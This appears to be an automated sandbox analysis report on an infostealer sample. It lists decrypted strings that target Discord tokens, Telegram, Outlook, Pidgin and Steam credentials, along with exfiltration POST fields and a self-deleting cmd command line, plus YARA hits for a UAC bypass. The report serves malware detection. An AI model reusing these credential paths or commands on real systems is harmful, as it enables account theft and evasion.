Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: /c start
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %DOCUMENTS%
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %PROGRAMFILES%
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %RECENT%
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: *.lnk
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: files
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \discord\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \Local Storage\leveldb
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \Telegram Desktop\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: key_datas
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: map*
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: F8806DD0C461824F*
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Telegram
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: *.tox
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: *.ini
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Password
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: 00000001
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: 00000002
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: 00000003
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: 00000004
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Pidgin
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \.purple\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: accounts.xml
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: token:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Software\Valve\Steam
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SteamPath
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \config\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ssfn*
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: config.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: DialogConfig.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: libraryfolders.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: loginusers.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \Steam\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: browsers
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: done
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: soft
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \Discord\tokens.txt
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: https
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: POST
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: HTTP/1.1
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: hwid
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: build
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: token
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: file_name
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: file
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: message
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: screenshot.jpg
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree, 1_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 1_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 1_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBFA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 1_2_6BBFA9A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBF43B0 PK11_PubEncryptPKCS1,PR_SetError, 1_2_6BBF43B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC20180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 1_2_6BC20180
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC1A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 1_2_6BC1A730
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBDE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 1_2_6BBDE6E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBD8670 PK11_ExportEncryptedPrivKeyInfo, 1_2_6BBD8670
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBFA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 1_2_6BBFA650
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC425B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 1_2_6BC425B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBF44C0 PK11_PubEncrypt, 1_2_6BBF44C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBC4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 1_2_6BBC4420
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBF4440 PK11_PrivDecrypt, 1_2_6BBF4440
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DF4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 2_2_00DF4280
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DF45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext, 2_2_00DF45A0

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 13.2.run.exe.37b586d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.56c5e64.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.56c5264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.57f9264.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.57f9e64.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.run.exe.450d86d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.run.exe.4551d5b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.run.exe.37f9d5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.57b5976.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.run.exe.37f915b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.5681976.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.run.exe.455115b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: run.exe PID: 7184, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 7216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: run.exe PID: 8040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Unpacked PE file: 0.2.kO1P1YnLst.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Unpacked PE file: 1.2.u5c4.0.exe.400000.0.unpack
Uses 32bit PE files
Source: kO1P1YnLst.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 169.150.236.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 169.150.236.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036160514.00000240F7980000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1883500412.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888596388.00000000049F8000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888307607.0000000004640000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138665040.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2139000539.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140183623.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139995282.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140368721.0000000003FF7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2370662584.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2367955603.0000000005409000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: mozglue.pdb source: u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000002.1882327714.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1797546896.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2066260274.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2136653870.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071517610.00000240FE690000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027627849.00000240F7070000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1889183698.000000006C8B7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2140800122.000000006CE97000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035836028.00000240F7970000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027735940.00000240F7080000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: kO1P1YnLst.exe
Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: IIDHJDGCGD.exe, 00000017.00000002.2969185171.0000000000EAC000.00000002.00000001.01000000.0000001D.sdmp, IIDHJDGCGD.exe, 00000017.00000000.2476318454.0000000000EAC000.00000002.00000001.01000000.0000001D.sdmp, tiktok[1].exe.1.dr
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035558933.00000240F7960000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027735940.00000240F7080000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035558933.00000240F7960000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1883500412.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888596388.00000000049F8000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888307607.0000000004640000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138665040.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2139000539.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140183623.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139995282.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140368721.0000000003FF7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2370662584.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2367955603.0000000005409000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071636257.00000240FE6A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3013066621.000002409001C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\timisa37 vugut_daxub.pdb source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000000.1740698273.0000000000413000.00000002.00000001.01000000.00000005.sdmp
